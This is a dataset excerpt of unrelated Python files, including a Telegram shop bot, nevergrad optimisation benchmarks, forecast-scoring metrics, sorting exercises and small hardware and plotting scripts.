user = User.objects.get(telegram_id=message.chat.id)\n user.address = new_address\n user.save()\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n order1 = Order.objects.create(user_telegram_id_1=cart.user_telegram_id, phone_number=user.phone_number,\n address=user.address)\n list_1 = []\n for i in cart.products:\n list_1.append(i.real_discount())\n order1.products_1.append(i.title)\n order1.save()\n user = User.objects.get(telegram_id=message.from_user.id)\n bot.send_message(message.chat.id, f'Ваш чек:\\n№ - {user.telegram_id}\\nОтримувач - {user.first_name}\\n'\n f'Список товарів - {order1.products_1}\\n'\n f'Номер телефону отримувача - {order1.phone_number}\\n'\n f'Адреса отримувача - {order1.address}\\n'\n f'До сплати - {sum(list_1)} грн\\n(。◕‿◕。)')\n bot.send_message(message.chat.id, THANKS_FOR_BUYING)\n else:\n bot.send_message(message.chat.id, CANT_UNDERSTAND)\n\n\n\n\n\n\n","sub_path":"My_tg_bot/shop_bot.py","file_name":"shop_bot.py","file_ext":"py","file_size_in_byte":10359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"44066381","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom pathlib import Path\n\nimport numpy as np\nimport PIL.Image\nimport torch.nn as nn\nimport torch\n\nimport nevergrad as ng\nfrom .. import base\n\n\nclass Image(base.ExperimentFunction):\n def __init__(self, problem_name: str = \"recovering\", index: int = 0) -> None:\n \"\"\"\n problem_name: the type of problem we are working on.\n recovering: we directly try to recover the target image.\n index: the index of the problem, inside the problem type.\n For example, if problem_name is \"recovering\" and index == 0,\n we try to recover the face of O. Teytaud.\n \"\"\"\n\n # Storing high level information.\n self.domain_shape = (256, 256, 3)\n self.problem_name = problem_name\n self.index = index\n\n # Storing data necessary for the problem at hand.\n assert problem_name == \"recovering\" # For the moment we have only this one.\n assert index == 0 # For the moment only 1 target.\n # path = os.path.dirname(__file__) + \"/headrgb_olivier.png\"\n path = Path(__file__).with_name(\"headrgb_olivier.png\")\n image = PIL.Image.open(path).resize((self.domain_shape[0], self.domain_shape[1]), PIL.Image.ANTIALIAS)\n self.data = np.asarray(image)[:, :, :3] # 4th Channel is pointless here, only 255.\n # parametrization\n array = ng.p.Array(init=128 * np.ones(self.domain_shape), mutable_sigma=True)\n array.set_mutation(sigma=35)\n array.set_bounds(lower=0, upper=255.99, method=\"clipping\", full_range_sampling=True)\n max_size = ng.p.Scalar(lower=1, upper=200).set_integer_casting()\n array.set_recombination(ng.p.mutation.Crossover(axis=(0, 1), max_size=max_size)).set_name(\"\") # type: ignore\n\n super().__init__(self._loss, array)\n self.register_initialization(problem_name=problem_name, index=index)\n self._descriptors.update(problem_name=problem_name, index=index)\n\n def _loss(self, x: np.ndarray) -> float:\n assert self.problem_name == \"recovering\"\n x = np.array(x, copy=False).ravel()\n x = x.reshape(self.domain_shape)\n assert x.shape == self.domain_shape, f\"Shape = {x.shape} vs {self.domain_shape}\"\n # Define the loss, in case of recovering: the goal is to find the target image.\n assert self.index == 0\n value = float(np.sum(np.fabs(np.subtract(x, self.data))))\n return value\n\n\nclass TestClassifier(nn.Module):\n def __init__(self, image_size: int = 224):\n super().__init__()\n self.model = nn.Linear(image_size * image_size * 3, 10)\n\n def forward(self, x):\n return self.model(x.view(x.shape[0], -1))\n\n\n# pylint: disable=too-many-arguments\nclass ImageAdversarial(base.ExperimentFunction):\n\n def __init__(self, classifier: nn.Module, image: torch.Tensor, label: int = 0, targeted: bool = False,\n epsilon: float = 0.05) -> None:\n # TODO add crossover params in args + criterion\n \"\"\"\n params : needs to be detailed\n \"\"\"\n self.targeted = targeted\n self.epsilon = epsilon\n self.image = image # if (image is not None) else torch.rand((3, 224, 224))\n self.label = torch.Tensor([label]) # if (label is not None) else torch.Tensor([0])\n self.label = self.label.long()\n self.classifier = classifier # if (classifier is not None) else Classifier()\n self.criterion = nn.CrossEntropyLoss()\n self.imsize = self.image.shape[1]\n\n array = ng.p.Array(init=np.zeros(self.image.shape), mutable_sigma=True, ).set_name(\"\")\n array.set_mutation(sigma=self.epsilon / 10)\n array.set_bounds(lower=-self.epsilon, upper=self.epsilon, method=\"clipping\", full_range_sampling=True)\n max_size = ng.p.Scalar(lower=1, upper=200).set_integer_casting()\n array.set_recombination(ng.p.mutation.Crossover(axis=(1, 2), max_size=max_size)) # type: ignore\n\n super().__init__(self._loss, array)\n self.register_initialization(classifier=classifier, image=image, label=label,\n targeted=targeted, epsilon=epsilon)\n # classifier and image cant be set as descriptors\n self.add_descriptors(label=label, targeted=targeted, epsilon=epsilon)\n\n @classmethod\n def from_testbed(\n cls,\n name: str,\n label: int = 0,\n targeted: bool = False,\n epsilon: float = 0.05\n ) -> \"ImageAdversarial\":\n if name == \"test\":\n imsize = 224\n classifier = TestClassifier(imsize)\n image = torch.rand((3, imsize, imsize))\n else:\n raise ValueError(f'Testbed \"{name}\" is not implemented, check implementation in {__file__}')\n func = cls(classifier=classifier, image=image, label=label, targeted=targeted, epsilon=epsilon)\n # clean up and update decsriptors\n assert func._initialization_kwargs is not None\n for d in [\"classifier\", \"image\"]:\n del func._initialization_kwargs[d]\n func._initialization_kwargs[\"name\"] = name\n func._initialization_func = cls.from_testbed # type: ignore\n func._descriptors.update(name=name)\n return func\n\n def _loss(self, x: np.ndarray) -> float:\n x = torch.Tensor(x)\n image_adv = torch.clamp(self.image + x, 0, 1)\n image_adv = image_adv.view(1, 3, self.imsize, self.imsize)\n output_adv = self.classifier(image_adv)\n if self.targeted:\n value = self.criterion(output_adv, self.label)\n else:\n value = -self.criterion(output_adv, self.label)\n return float(value.item())\n","sub_path":"nevergrad/functions/images/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"522076118","text":"# ASIF BUX\n\nimport string\n\n\"\"\"Character frequency\"\"\"\n\n'''Total number of characters'''\n\n\ndef process_file(filename):\n hist = {}\n file = open(filename)\n word = file.readlines()\n print(type(word))\n # for i in file:\n # wordList = []\n # wordList.append(i.strip())\n return wordList\n\n # for word in file:\n # # putting all the characters\n # for i in file:\n #\n # # update the histogram\n # hist[word] = hist.get(word, 0) + 1\n # return hist\n\nallCharacters = process_file('words.txt')\nprint(allCharacters)\n#\n# '''The ten most common characters'''\n#\n#\n# def most_common(hist):\n# t = []\n# for key, value in hist.items():\n# t.append((value, key))\n# t.sort()\n# t.reverse()\n# for freq, word in t[:10]:\n# print(word, ':', freq)\n# return t\n#\n#\n# print(most_common(allCharacters))\n#\n# '''The ten least common characters'''\n#\n#\n# def least_common(hist):\n# t = []\n# for key, value in hist.items():\n# t.append((value, key))\n# t.sort()\n# for freq, word in t[:10]:\n# print(word, ':', freq)\n# return t\n#\n#\n# print(least_common(allCharacters))\n","sub_path":"Assignment3/A03_1_char_frequency.py","file_name":"A03_1_char_frequency.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"342249274","text":"# Crear y cargar una lista con 5 enteros por teclado. Implementar un algoritmo que identifique el menor valor de la lista y la posición donde se encuentra.\n\n\nlista=[]\nfor x in range(5):\n valor=int(input(\"Ingrese valor: \"))\n lista.append(valor) \n\nmenor=lista[0]\nposicion=0\nfor x in range(1,5):\n if lista[x]<menor:\n menor=lista[x]\n posicion=x+1\n\nprint(f\"Lista completa: {lista}\")\nprint(f\"Menor de la lista: {menor}\")\nprint(f\"Posicion del menor en la lista: {posicion}\")","sub_path":"Ejercicios Listas/Listas8.py","file_name":"Listas8.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"207498014","text":"# This is adapted from Apache Software Foundation's count words example\n# included with Spark software. See http://www.apache.org/licenses/LICENSE-2.0 for\n# more info\n\n# This program takes an input file \"sample.txt\" and outputs a count of\n# words within the file\n\n# Access the SparkSession module from pyspark\nfrom pyspark.sql import SparkSession\n\n# Open a Spark session\nspark = SparkSession.builder.appName(\"count_words\").getOrCreate()\n \n# Read in the data file as rows\nlines = spark.read.text(\"test_data/sample.txt\").rdd.map(lambda r: r[0])\n\n# There are three transformations performed on the data to count the words\n# First transformation: FlatMap returns a dataset consisting of strings read from each row everytime a space is encountered\n# Second transformation: Map returns a dataset of words (as opposed to rows)\n# Third transformation: reduceByKey returns a dataset of unique keys (words)\n# and count of their occurrence\nword_count = lines.flatMap(lambda line: line.split(\" \"))\\\n .map(lambda word: (word, 1)) \\\n .reduceByKey(lambda a, b: a + b)\n \n# This performs the collect action, returning elements of the dataset created above\noutput = word_count.collect()\n\n# This prints out the results\nfor(word, count) in output: \n print(\"%s: %i\" % (word, count))\n \nspark.stop()","sub_path":"src/count_words.py","file_name":"count_words.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"540894488","text":"LIGHT_MAX = 1600\nLIGHT_MIN = 400\nLIGHT_INC = 200\n\nclass Light:\n \"\"\"Brightness incrementation doesn't work. Our light does not have this feature??? \"\"\"\n def __init__(self, pwm, pin):\n self.pwm = pwm\n self.pin = pin\n self.brightness = 800\n self.on = 0\n\n def inc_brightness(self):\n self.brightness += LIGHT_INC\n if self.brightness > LIGHT_MAX:\n self.brightness = LIGHT_MAX\n\n def dec_brightness(self):\n self.brightness -= LIGHT_INC\n if self.brightness < LIGHT_MIN:\n self.brightness = LIGHT_MIN\n\n def toggle(self):\n if not self.on:\n self.pwm.set_pwm(self.pin, 0, self.brightness)\n self.on = 1\n else:\n self.pwm.set_pwm(self.pin, 0, 0)\n self.on = 0\n\n def set_on(self):\n self.pwm.set_pwm(self.pin, 0, self.brightness)\n\n def set_off(self):\n self.pwm.set_pwm(self.pin, 0, 0)\n\nif __name__ == \"__main__\":\n import time\n import Adafruit_PCA9685\n\n PWM_FREQ = 48\n LIGHT_PIN = 15\n\n pwm = Adafruit_PCA9685.PCA9685()\n pwm.set_pwm_freq(PWM_FREQ) # 50 Hz is good for servo\n\n light = Light(pwm, LIGHT_PIN)\n light.set_on()\n time.sleep(1)\n light.set_off()\n time.sleep(3)\n\n","sub_path":"devices/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546754149","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport math\n\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom read_sim_data import *\n\ncolors = { 1:'b', 2:'r', 3:'y'}\ndef get_limits2D(time_intervals, idx):\n maxX = maxY = float(\"-inf\")\n minX = minY = float(\"inf\")\n for i in range(len(time_intervals)):\n x,y,c = get_plot_data2D(i, time_intervals, idx)\n maxX = max(max(x), maxX)\n maxY = max(max(y), maxY)\n minX = min(min(x), minX)\n minY = min(min(y), minY)\n return [(minX, maxX), (minY, maxY)]\n\ndef get_plot_data2D(i, time_intervals, idx):\n t = time_intervals[i]\n velocity_vecs = [n.vectors[idx] for n in t.nodes]\n x = [v.x for v in velocity_vecs]\n y = [v.y for v in velocity_vecs]\n c = [colors[n.group] for n in t.nodes]\n return (x, y, c)\n\ndef plot(time_intervals, idx):\n def update_plot(i, time_intervals, q):\n x, y, c = get_plot_data2D(i, time_intervals, ORIGINAL_POS)\n u, v, c = get_plot_data2D(i, time_intervals, idx)\n xy = np.array(zip(x,y))\n q.set_offsets(xy)\n q.set_UVC(u, v)\n return q,\n\n x, y, c = get_plot_data2D(0, time_intervals, ORIGINAL_POS)\n u, v, _ = get_plot_data2D(0, time_intervals, idx)\n\n fig = plt.figure()\n q = plt.quiver(x, y, u, v, color = c, pivot='tail',\n linewidths=(0.5,), edgecolors=('k'), headaxislength=2)\n\n xlim, ylim = get_limits2D(time_intervals, ORIGINAL_POS)\n plt.xlim(xlim)\n plt.ylim(ylim)\n\n anim = animation.FuncAnimation(fig, update_plot, frames=len(time_intervals),\n fargs=(time_intervals, q), interval=100)\n\n #anim.save('vec_fields.mov', fps=5, extra_args=['-vcodec', 'libx264'], dpi = 170)\n plt.show()\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n print(argv[1])\n plot(read_file(argv[1]), int(argv[2]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scenarios/scripts/old_scripts/vector_field.py","file_name":"vector_field.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13715840","text":"import logging\nfrom typing import cast\nfrom app.Exceptions.APIException import APIException\nfrom database.DBConnection import AlchemyEncoder, get_session\nfrom utils.http_utils import build_response, get_paginate_params\nfrom app.Data.Enum.http_status_code import HTTPStatusCode\nfrom app.Data.Interfaces.PaginationResult import PaginationResult\nfrom app.Services.QuestionService import QuestionService\nfrom app.Core.Controllers.BaseController import index, find, store, update, delete\n\ndef get_by_quiz(service, event: dict):\n session = get_session()\n (page, per_page) = get_paginate_params(event['queryStringParameters'])\n path_params = event['pathParameters']\n quizId = int(path_params['quizId'])\n \n try:\n elements = cast(QuestionService, service).filter_by_column(session, \"IdQuiz\", quizId, True)\n total_elements = cast(QuestionService, service).count_elements(session)\n body = PaginationResult(elements, page, per_page, total_elements).to_dict()\n status_code = HTTPStatusCode.OK.value\n except APIException as e:\n logging.exception(\"APIException occurred\")\n body = e.to_dict()\n status_code = e.status_code\n except Exception as e:\n logging.exception(\"Cannot make the request\")\n body = dict(message=\"Cannot make the request\")\n status_code = HTTPStatusCode.UNPROCESABLE_ENTITY.value\n finally:\n session.close()\n return build_response(status_code, body, jsonEncoder=AlchemyEncoder)","sub_path":"code/evaluation-system-be/app/Controllers/QuestionController.py","file_name":"QuestionController.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239674057","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 24 11:05:43 2017\n\n@author: heikki.huttunen@tut.fi\n\nAn example of using the LDA for pixel color classification.\nLeft mouse button shows examples of foreground, and\nright mouse button examples of background.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef onclick(event):\n \"\"\"\n Function that is run every time when used clicks the mouse.\n \"\"\"\n \n ix, iy = event.xdata, event.ydata\n button = event.button\n \n if button == 2:\n # Stop when used clicks middle button (or kills window)\n fig.canvas.mpl_disconnect(cid)\n plt.close(\"all\")\n else:\n # Otherwise add to the coords list.\n global coords\n coords.append([int(ix), int(iy), button])\n\nif __name__ == \"__main__\":\n \n # Load test image and show it.\n \n img = plt.imread(\"hh.jpg\")\n \n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.imshow(img)\n ax.set_title(\"Left-click: face; right-click: non-face; middle: exit\")\n coords = []\n \n # Link mouse click to our function above.\n \n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show()\n \n X = []\n y = []\n \n for ix, iy, button in coords:\n \n # Collect nearby samples to the user clicked point\n \n w = img[iy-3 : iy+4, ix-3:ix+4, :]\n \n # Unnecessarily complicated line to collect color channels\n # into a matrix (results in 49x3 matrix)\n \n C = np.array([w[...,c].ravel() for c in [0,1,2]]).T\n X.append(C)\n \n # Store class information to y.\n \n if button == 1:\n y.append(np.ones(C.shape[0]))\n else:\n y.append(np.zeros(C.shape[0]))\n \n X = np.concatenate(X, axis = 0)\n y = np.concatenate(y, axis = 0)\n X_test = np.array([img[...,c].ravel() for c in [0,1,2]]).T\n \n # Switch between sklearn and our own implementation.\n # Don't know why these produce slightly different results.\n # Both seem to work though.\n \n use_sklearn = True\n \n if use_sklearn:\n clf = LinearDiscriminantAnalysis()\n clf.fit(X, y)\n y_hat = clf.predict(X_test)\n \n else: # Do it the hard way:\n C0 = np.cov(X[y==0, :], rowvar = False)\n C1 = np.cov(X[y==1, :], rowvar = False)\n m0 = np.mean(X[y==0, :], axis = 0)\n m1 = np.mean(X[y==1, :], axis = 0)\n \n w = np.dot(np.linalg.inv(C0 + C1), (m1 - m0))\n T = 0.5 * (np.dot(w, m1) + np.dot(w, m0)) \n \n y_hat = np.dot(X_test, w) - T\n\n # Now y_hat is the class score.\n # Let's just threshold that at 0.\n # And cast from bool to integer\n \n y_hat = (y_hat > 0).astype(np.uint8)\n \n # Manipulate the vector form prediction to the original image shape.\n \n class_img = np.reshape(y_hat, img.shape[:2])\n prob_img = np.reshape(clf.predict_proba(X_test)[:, 1], img.shape[:2])\n \n fig, ax = plt.subplots(1, 3)\n ax[0].imshow(img)\n ax[1].imshow(prob_img)\n img[class_img == 0] = 0\n ax[2].imshow(img)\n\n # Show the data in a 3D plot.\n \n fig2 = plt.figure()\n ax = fig2.add_subplot(111, projection='3d')\n ax.plot(X[y==0, 0], X[y==0, 1], X[y==0, 2], 'ro')\n ax.plot(X[y==1, 0], X[y==1, 1], X[y==1, 2], 'bo')\n ax.plot(X_test[y_hat==0, 0], X_test[y_hat==0, 1], X_test[y_hat==0, 2], 'r.', alpha = 0.4)\n ax.plot(X_test[y_hat==1, 0], X_test[y_hat==1, 1], X_test[y_hat==1, 2], 'b.', alpha = 0.4)\n \n plt.show()\n ","sub_path":"code/mouse_click_LDA.py","file_name":"mouse_click_LDA.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631859991","text":"\"\"\"\nFunctions for evaluating forecasts.\n\"\"\"\nimport numpy as np\nimport xarray as xr\n#import properscoring as ps\nimport xskillscore as xs\nimport tqdm\nfrom tqdm import tqdm\n\ndef load_test_data(path, var, years=slice('2017', '2018'), cmip=False):\n \"\"\"\n Args:\n path: Path to nc files\n var: variable. Geopotential = 'z', Temperature = 't'\n years: slice for time window\n Returns:\n dataset: Concatenated dataset for 2017 and 2018\n \"\"\"\n assert var in ['z', 't'], 'Test data only for Z500 and T850'\n ds = xr.open_mfdataset(f'{path}/*.nc', combine='by_coords')[var]\n if cmip:\n ds['plev'] /= 100\n ds = ds.rename({'plev': 'level'})\n try:\n ds = ds.sel(level=500 if var == 'z' else 850).drop('level')\n except ValueError:\n pass\n return ds.sel(time=years)\n\ndef compute_weighted_rmse(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n \"\"\"\n Compute the RMSE with latitude weighting from two xr.DataArrays.\n Args:\n da_fc (xr.DataArray): Forecast. Time coordinate must be validation time.\n da_true (xr.DataArray): Truth.\n Returns:\n rmse: Latitude weighted root mean squared error\n \"\"\"\n error = da_fc - da_true\n weights_lat = np.cos(np.deg2rad(error.lat))\n weights_lat /= weights_lat.mean()\n rmse = np.sqrt(((error)**2 * weights_lat).mean(mean_dims))\n return rmse\n\n\ndef evaluate_iterative_forecast(da_fc, da_valid, func, mean_dims=xr.ALL_DIMS):\n rmses = []\n for f in da_fc.lead_time:\n fc = da_fc.sel(lead_time=f)\n fc['time'] = fc.time + np.timedelta64(int(f), 'h')\n rmses.append(func(fc, da_valid, mean_dims))\n return xr.concat(rmses, 'lead_time')\n\n\ndef compute_weighted_acc(da_fc, da_true, centered=True):\n clim = da_true.mean('time')\n t = np.intersect1d(da_fc.time, da_true.time)\n fa = da_fc.sel(time=t) - clim\n a = da_true.sel(time=t) - clim\n \n weights_lat = np.cos(np.deg2rad(da_fc.lat))\n weights_lat /= weights_lat.mean()\n w = weights_lat\n \n if centered:\n fa_prime = fa - fa.mean()\n a_prime = a - a.mean()\n else:\n fa_prime = fa\n a_prime = a\n \n acc = (\n np.sum(w * fa_prime * a_prime) /\n np.sqrt(\n np.sum(w * fa_prime**2) * np.sum(w * a_prime**2)\n )\n )\n return acc\n\n\ndef compute_weighted_meanspread(da_fc,mean_dims=xr.ALL_DIMS):\n \"\"\"\n prediction: xarray. Coordinates: time, forecast_number, lat, lon. Variables: z500, t850\n time: Let there be I initial conditions\n forecast_number: For each initial condition, let there be N forecasts\n #mean variance\n #1. for each input i, for each gridpoint, find variance among all N forecasts for that single input i\n #2. for each input i, find latitude-weighted average of all the lat*lon points\n #3. find average of all I inputs. take square root\n \"\"\"\n var1=da_fc.var('member')\n weights_lat = np.cos(np.deg2rad(var1.lat))\n weights_lat /= weights_lat.mean()\n mean_spread= np.sqrt((var1*weights_lat).mean(mean_dims))\n \n return mean_spread\n\n\ndef compute_weighted_crps(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n da_true=da_true.sel(time=da_fc.time)\n assert (da_true.time==da_fc.time).all #checking size.\n \n weights_lat = np.cos(np.deg2rad(da_fc.lat))\n weights_lat /= weights_lat.mean()\n crps = xs.crps_ensemble(da_true, da_fc)\n crps = (crps * weights_lat).mean(mean_dims)\n return crps\n# def crps_score(da_fc,da_true,member_axis,mean_dims=xr.ALL_DIMS): \n# #check size\n# da_true=da_true.sel(time=da_fc.time)\n# assert (da_true.time==da_fc.time).all\n \n# #import properscoring as ps\n# obs = np.asarray(da_true.to_array(), dtype=np.float32).squeeze();\n# #shape: (variable,time, lat, lon)\n# pred=np.asarray(da_fc.to_array(), dtype=np.float32).squeeze();\n# #shape: (variable, member, time, lat, lon)\n# member_axis=member_axis+1 #Weird but have to do since the above line changes position of member_axis\n# if pred.ndim==4: #for single ensemble member. #ToDo: make it general\n# pred=np.expand_dims(pred,axis=member_axis)\n \n# crps=ps.crps_ensemble(obs,pred, weights=None, issorted=False,axis=member_axis) \n# #crps.shape #(variable, time, lat, lon)\n# # if crps.ndim==3: #for single input.#ToDo: make it general\n# # crps=np.expand_dims(crps,axis=member_axis)\n# #Converting back to xarray\n# crps_score = xr.Dataset({\n# 'z500': xr.DataArray(\n# crps[0,...],\n# dims=['time', 'lat', 'lon'],\n# coords={'time': da_true.time, 'lat': da_true.lat, 'lon': da_true.lon,\n# },\n# ),\n# 't850': xr.DataArray(\n# crps[1,...],\n# dims=['time', 'lat', 'lon'],\n# coords={'time': da_true.time, 'lat': da_true.lat, 'lon': da_true.lon,\n# },\n# )\n# })\n \n# #averaging to get single valye\n# weights_lat = np.cos(np.deg2rad(crps_score.lat))\n# weights_lat /= weights_lat.mean()\n# crps_score = (crps_score* weights_lat).mean(mean_dims)\n \n# return crps_score\n\ndef compute_weighted_mae(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n \"\"\"\n Compute the MAE with latitude weighting from two xr.DataArrays.\n Args:\n da_fc (xr.DataArray): Forecast. Time coordinate must be validation time.\n da_true (xr.DataArray): Truth.\n Returns:\n mae: Latitude weighted root mean squared error\n \"\"\"\n error = da_fc - da_true\n weights_lat = np.cos(np.deg2rad(error.lat))\n weights_lat /= weights_lat.mean()\n mae = (np.abs(error) * weights_lat).mean(mean_dims)\n return mae\n\ndef compute_bin_crps(obs, preds, bin_edges):\n \"\"\"\n Last axis must be bin axis\n obs: [...]\n preds: [..., n_bins]\n \"\"\"\n# pdb.set_trace()\n obs = obs.values\n preds = preds.values\n\n # Convert observation\n a = np.minimum(bin_edges[1:], obs[..., None])\n# b = bin_edges[:-1] * (bin_edges[0:-1] > obs[..., None])\n b = np.where(bin_edges[:-1] > obs[..., None], bin_edges[:-1], -np.inf)\n y = np.maximum(a, b)\n# print('a =', a)\n# print('b =', b)\n# print('y =', y)\n # Convert predictions to cumulative predictions with a zero at the beginning\n cum_preds = np.cumsum(preds, -1)\n cum_preds_zero = np.concatenate([np.zeros((*cum_preds.shape[:-1], 1)), cum_preds], -1)\n xmin = bin_edges[..., :-1]\n xmax = bin_edges[..., 1:]\n lmass = cum_preds_zero[..., :-1]\n umass = 1 - cum_preds_zero[..., 1:]\n# y = np.atleast_1d(y)\n# xmin, xmax = np.atleast_1d(xmin), np.atleast_1d(xmax)\n# lmass, lmass = np.atleast_1d(lmass), np.atleast_1d(lmass)\n scale = xmax - xmin\n# print('scale =', scale)\n y_scale = (y - xmin) / scale\n# print('y_scale = ', y_scale)\n \n z = y_scale.copy()\n z[z < 0] = 0\n z[z > 1] = 1\n# print('z =', z)\n a = 1 - (lmass + umass)\n# print('a =', a)\n crps = (\n np.abs(y_scale - z) + z**2 * a - z * (1 - 2*lmass) + \n a**2 / 3 + (1 - lmass) * umass\n )\n return np.sum(scale * crps, -1)\n\ndef compute_bin_crps_da(da_true, da_fc, batch=100):\n n = int(np.ceil(len(da_fc.time) / batch))\n result = []\n for i in tqdm(range(n)):\n sl = slice(i*batch, (i+1)*batch)\n r = compute_bin_crps(da_true.isel(time=sl), da_fc.isel(time=sl), da_fc.bin_edges)\n result.append(r)\n return np.concatenate(result)\n \ndef compute_weighted_bin_crps(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n \"\"\"\n \"\"\"\n t = np.intersect1d(da_fc.time, da_true.time)\n da_fc, da_true = da_fc.sel(time=t), da_true.sel(time=t)\n weights_lat = np.cos(np.deg2rad(da_true.lat))\n weights_lat /= weights_lat.mean()\n dims = ['time', 'lat', 'lon']\n if type(da_true) is xr.Dataset:\n das = []\n for var in da_true:\n result = compute_bin_crps_da(da_true[var], da_fc[var])\n# result = compute_bin_crps(da_true[var], da_fc[var], da_fc[var].bin_edges)\n das.append(xr.DataArray(\n result, dims=dims, coords=dict(da_true.coords), name=var\n ))\n crps = xr.merge(das)\n else:\n# result = compute_bin_crps(da_true, da_fc, da_fc.bin_edges)\n result = compute_bin_crps_da(da_true, da_fc)\n crps = xr.DataArray(\n result, dims=dims, coords=dict(da_true.coords), name=da_fc.name\n )\n crps = (crps * weights_lat).mean(mean_dims)\n return crps","sub_path":"src/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646752060","text":"import time\nimport random\n\nclass Sort:\n limit = 5\n count = 0\n\n def __init__(self, data = None):\n if data == None:\n self.data = []\n else:\n self.data = data\n\n def data_assign(self, amount):\n for i in range(amount):\n self.data.append(random.randint(1, 99))\n\n def partition(self, start, end):\n data = self.data[start:end+1]\n\n pivot = 0\n \n pivot_num = data[pivot]\n data_1 = data[:pivot]\n data_2 = data[pivot+1:]\n \n def comparator_1(indeks = 0):\n if indeks < len(data_1):\n self.count += 1\n if data_1[indeks] > pivot_num:\n data_2.append(data_1.pop(indeks))\n comparator_1(indeks)\n else:\n comparator_1(indeks+1)\n \n def comparator_2(indeks = 0):\n if indeks < len(data_2):\n self.count += 1\n if data_2[indeks] < pivot_num:\n data_1.append(data_2.pop(indeks))\n comparator_2(indeks)\n else:\n comparator_2(indeks+1)\n\n comparator_1()\n comparator_2()\n\n pivot = len(data_1)\n data_1.append(pivot_num)\n data = data_1 + data_2\n\n self.data[start:end+1] = data\n return pivot\n\n def insert(self, start, end, indeks = None, rec = 0):\n if indeks == None:\n indeks = start + 1\n\n if indeks >= start and indeks <= end:\n data = self.data\n self.count += 1\n if rec == 0:\n self.fr = indeks\n\n if data[self.fr] < data[indeks-1] and indeks != 0:\n self.insert(start, end, indeks-1, rec+1)\n\n elif rec != 0:\n data.insert(indeks, data.pop(self.fr))\n\n if rec == 0:\n self.insert(start, end, indeks+1)\n\n def quick(self, start, end):\n if start < end:\n pivot = start + self.partition(start, end)\n self.quick(start, pivot-1)\n self.quick(pivot+1, end)\n \n def quick_insert(self, start, end):\n if start < end:\n pivot = start + self.partition(start, end)\n if (pivot - 1) - start < self.limit:\n self.insert(start, pivot - 1)\n else:\n self.quick_insert(start, pivot - 1)\n \n if end - (pivot + 1) < self.limit:\n self.insert(pivot + 1, end)\n else:\n self.quick_insert(pivot + 1, end)\n\n def combosort(self):\n self.quick_insert(0, len(self.data) - 1)\n\ndef binary(target, arr, start, end):\n if start <= end:\n middle = int((start + end) / 2)\n if target == arr[middle]:\n return middle + 1\n elif target < arr[middle]:\n return binary(target, arr, start, middle-1)\n else:\n return binary(target, arr, middle+1, end)\n else:\n return -1\n\ndef binary_search(target, arr):\n return binary(target, arr, 0, len(arr))\n\na = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n\nsorter = Sort(a)\nsorter.combosort()\n\na = sorter.data\nprint (a)\n\nprint (binary_search(4, a))\n","sub_path":"no-03.py","file_name":"no-03.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39949842","text":"#!/usr/bin/env python3\n\nimport re\nimport warnings\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom enum import Enum\nfrom functools import reduce\nfrom itertools import zip_longest\nfrom math import log10\nfrom pathlib import Path\nfrom pprint import pprint, pformat\nfrom typing import (\n ClassVar,\n Generator,\n Iterator,\n MutableMapping,\n NoReturn,\n Optional,\n Sequence,\n Union,\n Pattern, )\n\nimport attr\nfrom openpyxl import load_workbook\nfrom openpyxl.worksheet import Worksheet as Factors\n\nfrom upc.annuities import annuities\nfrom upc.helpers import decimal_round, parse\nfrom upc.packages.clint.textui import colored, puts\nfrom upc.packages.clint.textui.cols import console_width\n\n\nclass Gender(Enum):\n\n MALE = \"M\"\n FEMALE = \"F\"\n NEUTRAL = \"N\"\n\n def __str__(self):\n return self.value\n\n @property\n def male_like(self):\n return [\"M\", \"0\", \"MALE\", \"男\"]\n\n @property\n def female_like(self):\n return [\"F\", \"1\", \"FEMALE\", \"女\"]\n\n @classmethod\n def patterns(cls) -> Pattern:\n return re.compile(\n 